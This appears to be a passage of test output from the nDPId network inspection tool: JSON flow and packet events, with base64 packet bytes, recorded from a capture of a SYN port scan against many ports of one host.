-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/twAADMGFpasEAAIQA2GNIzSPozdUoMYAAAAAGACEADqAgAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAsECUAACsGDU6sEAAIQA2GNIzSnQHdUoMYAAAAAGACEACLjQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAsdZEAADYGnOGsEAAIQA2GNIzSB5vdUoMYAAAAAGACDAAk9AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAs38EAADAGOLGsEAAIQA2GNIzSFiLdUoMYAAAAAGACBAAebQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAssGMAACsGbQ+sEAAIQA2GNIzSFGrdUoMYAAAAAGACEAAUJQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsUY0AADUGweWsEAAIQA2GNIzSI1DdUoMYAAAAAGACCAANPwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAscmYAADgGngysEAAIQA2GNIzSH0vdUoMYAAAAAGACBAAVRAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs2lMAADQGOh+sEAAIQA2GNIzSAaHdUoMYAAAAAGACBAAy7gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsxpQAAC8GUt6sEAAIQA2GNIzSgAPdUoMYAAAAAGACEACoiwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsEeAAACgGDpOsEAAIQA2GNIzSF3HdUoMYAAAAAGACBAAdHgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsuFoAAC8GYRisEAAIQA2GNIzSBd\/dUoMYAAAAAGACEAAisAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/1UAACcGIh2sEAAIQA2GNIzSBDTdUoMYAAAAAGACEAAkWwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsi7oAADYGhrisEAAIQA2GNIzSD6LdUoMYAAAAAGACDAAc7QAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAswXcAACgGXvusEAAIQA2GNIzSADHdUoMYAAAAAGACBAA0XgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsersAAC4Gn7esEAAIQA2GNIzSCD\/dUoMYAAAAAGACDAAkUAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs4xUAADoGK12sEAAIQA2GNIzSAQjdUoMYAAAAAGACDAArhwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs0AcAADMGRWusEAAIQA2GNIzSBdzdUoMYAAAAAGACEAAiswAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs3jUAACkGQT2sEAAIQA2GNIzSwAndUoMYAAAAAGACCABwhQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs4bMAACsGO7+sEAAIQA2GNIzSBDndUoMYAAAAAGACEAAkVgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0gAADYGSyqsEAAIQA2GNIzSCcTdUoMYAAAAAGACDAAiywAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsMJQAADkG3t6sEAAIQA2GNIzSGafdUoMYAAAAAGACCAAW6AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1493,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsmh8AADkGdVOsEAAIQA2GNIzSBAndUoMYAAAAAGACCAAshgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsyJIAAC0GUuCsEAAIQA2GNIzSAnfdUoMYAAAAAGACCAAuGAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_packet_id":1,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060699,"pkt":"ACYLMQczACWzv5HuCABFAAAsRs4AAC8G0qSsEAAIQA2GNIzSAojdUoMYAAAAAGACEAAmBwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060699,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 